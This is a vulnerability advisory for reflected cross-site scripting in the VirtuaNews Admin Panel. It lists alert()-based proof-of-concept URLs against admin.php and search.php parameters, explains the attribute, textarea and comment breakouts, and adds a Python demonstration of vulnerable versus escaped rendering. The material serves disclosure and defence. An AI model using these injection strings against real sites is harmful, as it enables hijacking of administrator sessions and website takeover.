zbeng

Cross Site Scripting Vulnerability

1) Introduction

2) Bug

3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============

1) Introduction

===============

VirtuaNews Admin Panel is good administration software. Many administrators choose it
as their "safe door", so it should be strong and safe. The main risk described in this
advisory is the harm that can be done to the administration staff. A vulnerability that
affects the staff is more dangerous than one that affects ordinary users: if a staff
member's cookie is stolen, the attacker can take over the website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======

2) Bug

======

The vulnerability is reflected Cross Site Scripting. The script passed in the query
string of any of the following URLs is echoed back into the page without HTML escaping:

http://<host>/admin.php?"><script>alert('XSS')</script>

http://<host>/forum/search.php?do=process&showposts=0&query=<script>alert('XSS')</script>

http://<host>/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&mainnews=~~~~"></textarea><script>alert('XSS')</script>

http://<host>/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&mainnews=~~~~"></textarea>--><script>alert('XSS')</script>

http://<host>/admin.php?">action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&mainnews=~~~~"></textarea><script>alert('XSS')</script>

http://<host>/admin.php?action=files&expand="><script>alert('XSS')</script>

http://<host>/admin.php?action=files_cat_delete&id="><script>alert('XSS')</script>

http://<host>/admin.php?action=files_check&catid="><script>alert('XSS')</script>

http://<host>/admin.php?action=newslogo_upload&"><script>alert('XSS')</script>

The shape of each payload tells you where the value lands in the response: `">` closes
an attribute value and the tag it sits in (the `expand`, `id` and `catid` cases),
`</textarea>` ends the text area that `mainnews` is echoed into, and `-->` is added for
the case where the value is reflected inside an HTML comment. Whatever follows is then
parsed as markup, so the `<script>` element is created and executed in the browser of
whoever follows the link. Most of the affected pages live under admin.php, so the
realistic target is a logged-in administrator who is tricked into opening such a link,
which is exactly the staff risk the introduction describes.

In the words of securityfocus.com :

~~~~~~~~~~~~~~~~~~~~~~~~~~

If all of these circumstances are met, an attacker may be able to exploit this issue
via a malicious link containing arbitrary HTML and script code as part of the hostname.
When the malicious link is clicked by an unsuspecting user, the attacker-supplied HTML
and script code will be executed by their web client. This will occur because the server
will echo back the malicious hostname supplied in the client's request, without
sufficiently escaping HTML and script code.

Attacks of this nature may make it possible for attackers to manipulate web content or
to steal cookie-based authentication credentials. It may be possible to take arbitrary
actions as the victim user.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========

3) The Code

===========

http://<host>/admin.php?"><script>alert('XSS')</script>

http://<host>/forum/search.php?do=process&showposts=0&query=<script>alert('XSS')</script>

http://<host>/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&mainnews=~~~~"></textarea><script>alert('XSS')</script>

http://<host>/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&mainnews=~~~~"></textarea>--><script>alert('XSS')</script>

http://<host>/admin.php?">action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&mainnews=~~~~"></textarea><script>alert('XSS')</script>

http://<host>/admin.php?action=files&expand="><script>alert('XSS')</script>

http://<host>/admin.php?action=files_cat_delete&id="><script>alert('XSS')</script>

http://<host>/admin.php?action=files_check&catid="><script>alert('XSS')</script>

http://<host>/admin.php?action=newslogo_upload&"><script>alert('XSS')</script>
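The following is an added example, not VirtuaNews code and not part of the original
advisory. It models the two reflection contexts the PoC URLs above break out of, an
attribute value (the `expand` parameter) and a `<textarea>` body (the `mainnews`
parameter), with a vulnerable renderer that echoes the raw value beside a hardened one
that escapes it, and then runs the advisory's own PoC query strings through both. The
page templates, the `example.test` host standing in for `<host>`, and the function names
are assumptions made for the illustration; the check itself is an HTML parse of the
response, so it reports what a browser would actually build rather than just whether
the string came back.

```python
"""Added example (not VirtuaNews code): reflected XSS in admin.php-style
query parameters, vulnerable renderer beside the hardened one, verified
against the advisory's PoC URLs with an HTML parser."""
import html
from html.parser import HTMLParser
from urllib.parse import parse_qsl, urlsplit

# PoC URLs from the advisory; example.test is an assumed stand-in for <host>.
POC_EXPAND = ("http://example.test/admin.php?action=files"
              "&expand=\"><script>alert('XSS')</script>")
POC_MAINNEWS = ("http://example.test/admin.php?action=vulns_add&catid=SELECT"
                "&title=~~~~~~~~~~~&mainnews=~~~~\"></textarea>"
                "<script>alert('XSS')</script>")


def params_from_url(url):
    """Query string -> dict, roughly what PHP's $_GET would hold.
    keep_blank_values keeps pairs with no '=' (admin.php?"><script>...)."""
    return dict(parse_qsl(urlsplit(url).query, keep_blank_values=True))


def render_vulnerable(get):
    """Assumed template that echoes raw input: the behaviour the advisory
    describes.  '">' closes the attribute and tag; '</textarea>' closes
    the text area; whatever follows is parsed as markup."""
    return (
        f'<input type="text" name="expand" value="{get.get("expand", "")}">\n'
        f'<textarea name="mainnews">{get.get("mainnews", "")}</textarea>'
    )


def escape_for_html(value):
    """Escape for HTML text and attribute contexts.  quote=True also turns
    " and ' into entities, so an attribute value cannot be closed early."""
    return html.escape(value, quote=True)


def render_hardened(get):
    """Same markup with each reflected value escaped for where it lands."""
    return (
        f'<input type="text" name="expand" '
        f'value="{escape_for_html(get.get("expand", ""))}">\n'
        f'<textarea name="mainnews">'
        f'{escape_for_html(get.get("mainnews", ""))}</textarea>'
    )


class StartTags(HTMLParser):
    """Collects start tags, i.e. the elements a browser would create."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def script_tags_in(markup):
    """Number of <script> elements an HTML parser finds in the response."""
    parser = StartTags()
    parser.feed(markup)
    parser.close()
    return parser.tags.count("script")


def reflects_script(render, url):
    """True when the PoC in `url` yields at least one live <script> element."""
    return script_tags_in(render(params_from_url(url))) > 0


if __name__ == "__main__":
    for url in (POC_EXPAND, POC_MAINNEWS):
        print(url)
        print("  vulnerable renderer creates <script>:",
              reflects_script(render_vulnerable, url))
        print("  hardened renderer creates <script>:  ",
              reflects_script(render_hardened, url))
```

The same `reflects_script` check can be pointed at a real response body instead of the
assumed templates; what matters is that the verdict comes from parsing the page, since
an escaped `&lt;script&gt;` still contains the literal text but never becomes an element.
Escaping is context-specific: `html.escape` is right for text and quoted attributes,
but a value reflected into a URL or inside a script block needs a different encoder.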
